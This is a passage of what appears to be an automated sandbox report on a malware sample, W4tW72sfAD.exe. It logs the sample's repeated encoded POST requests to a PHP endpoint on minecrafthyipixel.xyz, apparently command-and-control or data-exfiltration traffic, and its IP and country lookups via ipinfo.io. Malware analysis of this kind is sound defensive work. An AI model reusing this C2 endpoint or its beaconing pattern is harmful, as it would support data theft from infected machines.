                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:31.807384968 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:31.807733059 CEST2512OUTData Raw: 57 5f 5e 5c 59 44 54 5e 5c 5e 59 59 57 52 58 5a 54 54 5f 58 54 5f 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_^\YDT^\^YYWRXZTT_XT_S^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&.&U"+3 ;\']"?87Y&,T2]1 ".U++[#,,:%$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:32.171611071 CEST615INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vFDI24jH4HEu5AosAWegMrOZVZjUEd1vpgTFsBtTB42SBOwwl179nuO6waSAjfb1GrD5OdTnbU%2BISJlphsY8AqzGIpmVChgEPAkWOUf0qVhOnKiLYrVrrHhrTFpef3tjm2sFuFEkuhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4a67d746768-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:32.171679974 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    186192.168.2.449940104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:32.388678074 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:32.494462967 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:32.494594097 CEST2512OUTData Raw: 52 5a 5b 5e 59 42 54 5f 5c 5e 59 59 57 50 58 59 54 57 5f 5c 54 5e 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[^YBT_\^YYWPXYTW_\T^S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2.S6?0V+\3=P?(#^2901+*W72->;84<\.$[. X
                                                                                                                                    Apr 19, 2024 13:44:32.764496088 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:32 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p7kChT1N6L0ObFyUxNimQSs2fMOwzXJoMdVNBGuHKnRtMaMTzOqo%2FETw3iOmFcjIoesnBj9KLT65RPGrtTCPxviCyUN8tMWwilq6NkCNkIMHBpjUmpGml8c4lJ0Fkbd6%2BhNBa5Ie3dw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4aac9d3674a-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:32.764554977 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    187192.168.2.449941104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:32.984417915 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:33.089418888 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:33.089554071 CEST2512OUTData Raw: 52 58 5e 5c 59 4b 54 5f 5c 5e 59 59 57 55 58 52 54 54 5f 58 54 58 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RX^\YKT_\^YYWUXRTT_XTXS]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\2.)5+<30;0;.=+#]':<U21#!=+;7 8.$[. X -
                                                                                                                                    Apr 19, 2024 13:44:33.461630106 CEST617INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:33 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g8dem7EX22mW82mjUlIq0US5A6JWeaTyMI%2F3CZhIA3Se98LC46ligoutfL46lPNiBwRgbBdUMc5msNsd4S0fS7qeCzS8Qm7pvT0fKYrALg1XqclcN3h%2FOheZvxgu5UoY6aTPvtrv21I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4ae7c8ead76-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:33.461688042 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    188192.168.2.449942104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:33.686579943 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:33.792372942 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:33.792742014 CEST2504OUTData Raw: 57 55 5b 58 59 41 54 59 5c 5e 59 59 57 57 58 5f 54 5b 5f 5a 54 5b 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WU[XYATY\^YYWWX_T[_ZT[S]^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>R6'$#$3;"=8 1T%- +($"/;-5$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:34.140918016 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CtGWHGsItuTKGgkyfTI%2FJ2qjnZ2rJ5EtFYqNo7QgzrgcsRhdU4QjvjARpKl9AP0Ccygu2wF4rM3KAedhRpLMoX2%2BmL%2FkpEFHC9nw1jkXueZfjELCZsaCipCutSrDXbR%2FDwXtuWgQnE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4b2eccb17fb-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:34.140981913 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    189192.168.2.449943104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:34.357920885 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:34.462258101 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:34.462428093 CEST2512OUTData Raw: 52 59 5b 5c 5c 44 54 58 5c 5e 59 59 57 51 58 5c 54 55 5f 56 54 5b 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY[\\DTX\^YYWQX\TU_VT[S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>2!;?' 33;=?(+X&)32) 25+;'4#.$[. X =
                                                                                                                                    Apr 19, 2024 13:44:34.735208035 CEST619INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:34 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=69Uwd7MyyK9uwHaDuQUv%2BpNZuGGG2hsIdhxzqxG4i%2FYuUUTAcMm8giJHe4Nq2SvPK%2BkfEZuUsw9smghhWMqSYLAW5EB7tiiP95ZbBNLQyl4M5LnGw55amqsO8EZLMGUyfpYym4h6STY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4b71bdf4590-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:34.735271931 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    190192.168.2.449944104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:34.973005056 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:35.077496052 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:35.077708960 CEST2512OUTData Raw: 52 5a 5e 5b 5c 40 51 58 5c 5e 59 59 57 53 58 5c 54 51 5f 5c 54 55 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^[\@QX\^YYWSX\TQ_\TUS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&>!"Y''^$*'\%:0U2]>W72)*('4+.$[. X 5
                                                                                                                                    Apr 19, 2024 13:44:35.337918043 CEST627INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:35 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xr%2Fm1vMJOfHnfiFRNPpw1abrCTmZ76%2BzO2Msmh7LX5nRgC5uKPENHAJGza%2BrO%2FccKo6oc4WFStiew7YpKD1CwlETkDNmC3jcspiA9zJV8btO3kkgFTyBkNu8lyh%2BRL%2BoACtNJqD%2FFyo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4baeb8812d6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:35.337981939 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    191192.168.2.449945104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:35.561846972 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:35.667648077 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:35.667917013 CEST2512OUTData Raw: 52 5e 5e 59 59 42 51 58 5c 5e 59 59 57 5e 58 5b 54 57 5f 59 54 54 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^YYBQX\^YYW^X[TW_YTTS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-6"8[& 0;V?((2)+%]-41==#7, [.5$[. X


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    192192.168.2.449946104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:35.915833950 CEST386OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:36.020354986 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:36.023571014 CEST2192OUTData Raw: 52 59 5e 59 59 4a 54 54 5c 5e 59 59 57 5e 58 53 54 5a 5f 56 54 5b 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RY^YYJTT\^YYW^XSTZ_VT[SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%]&%"$$$'+-?(81?&6#2>'_ Z8.$[. X
                                                                                                                                    Apr 19, 2024 13:44:36.386240005 CEST772INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h0G2e4eS1VSA%2FX27e4ZXZAvhHF2j4CvkP7GCz1k1u6GqiUbTRq6c1yf39Bg3tJ7%2BWWEas%2FFOaZTfeURlyBeSebOMA8Sh%2BDLMUyYjwC9AdzUUgDhX4AnmX0X1wW3ewGIr%2Bf0erpyxQho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4c0ddc178d1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 5d 33 25 31 05 21 3a 2b 5a 3e 33 25 03 3e 09 3a 04 3e 17 07 17 23 2d 12 1f 2f 3a 37 00 3e 2b 22 15 26 23 31 19 27 3d 30 51 31 30 21 59 00 1a 39 5f 23 12 3d 1f 2d 2a 2e 01 3c 0f 29 5b 34 21 33 17 28 2d 31 50 37 3b 33 18 28 00 21 50 38 28 33 0e 2b 28 26 03 38 0e 26 58 20 3b 2c 52 09 12 26 08 3f 28 28 10 25 0e 25 1d 23 21 3c 1e 3c 01 00 11 25 38 24 12 26 23 38 5e 2d 21 22 51 31 00 26 0d 2a 3a 2c 56 34 3c 08 0b 24 2e 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$]3%1!:+Z>3%>:>#-/:7>+"&#1'=0Q10!Y9_#=-*.<)[4!3(-1P7;3(!P8(3+(&8&X ;,R&?((%%#!<<%8$&#8^-!"Q1&*:,V4<$..^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:36.386298895 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                    193192.168.2.449947104.21.57.6180
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Apr 19, 2024 13:44:36.064654112 CEST362OUTPOST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:36.170178890 CEST25INHTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:36.175318003 CEST2512OUTData Raw: 52 5e 5b 59 59 41 51 5d 5c 5e 59 59 57 56 58 5d 54 5a 5f 5f 54 58 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[YYAQ]\^YYWVX]TZ__TXS\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%*U!(\'40;T?(0&<T%6S416)?##.$[. X !
                                                                                                                                    Apr 19, 2024 13:44:36.438750982 CEST621INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:36 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EDew04V4Vq%2B9MPEATvaPyi7bTm6zwaK%2BYwtKtOykbIfdU6vmHfjyLGoQKCJkiSLleZg9UpQcNmm85%2BLZbloUAgSdT8%2B9x3PRVl5VZ7t3wFpTaDm0e8hfcm3yTEhvSsMKMEc3VqisEhE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4c1bff8ad6b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:36.438810110 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    0192.168.2.44973034.117.186.1924436988C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-19 11:41:58 UTC61OUTGET /ip HTTP/1.1
                                                                                                                                    Host: ipinfo.io
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-19 11:41:58 UTC361INHTTP/1.1 200 OK
                                                                                                                                    server: nginx/1.24.0
                                                                                                                                    date: Fri, 19 Apr 2024 11:41:58 GMT
                                                                                                                                    content-type: text/plain; charset=utf-8
                                                                                                                                    Content-Length: 12
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    x-envoy-upstream-service-time: 1
                                                                                                                                    via: 1.1 google
                                                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                    Connection: close
                                                                                                                                    2024-04-19 11:41:58 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                                                                                    Data Ascii: 81.181.57.52


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.44973134.117.186.1924436988C:\Users\user\Desktop\W4tW72sfAD.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-19 11:41:59 UTC42OUTGET /country HTTP/1.1
                                                                                                                                    Host: ipinfo.io
                                                                                                                                    2024-04-19 11:41:59 UTC504INHTTP/1.1 200 OK
                                                                                                                                    server: nginx/1.24.0
                                                                                                                                    date: Fri, 19 Apr 2024 11:41:59 GMT
                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                    Content-Length: 3
                                                                                                                                    access-control-allow-origin: *
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                    x-envoy-upstream-service-time: 2
                                                                                                                                    via: 1.1 google
                                                                                                                                    strict-transport-security: max-age=2592000; includeSubDomains
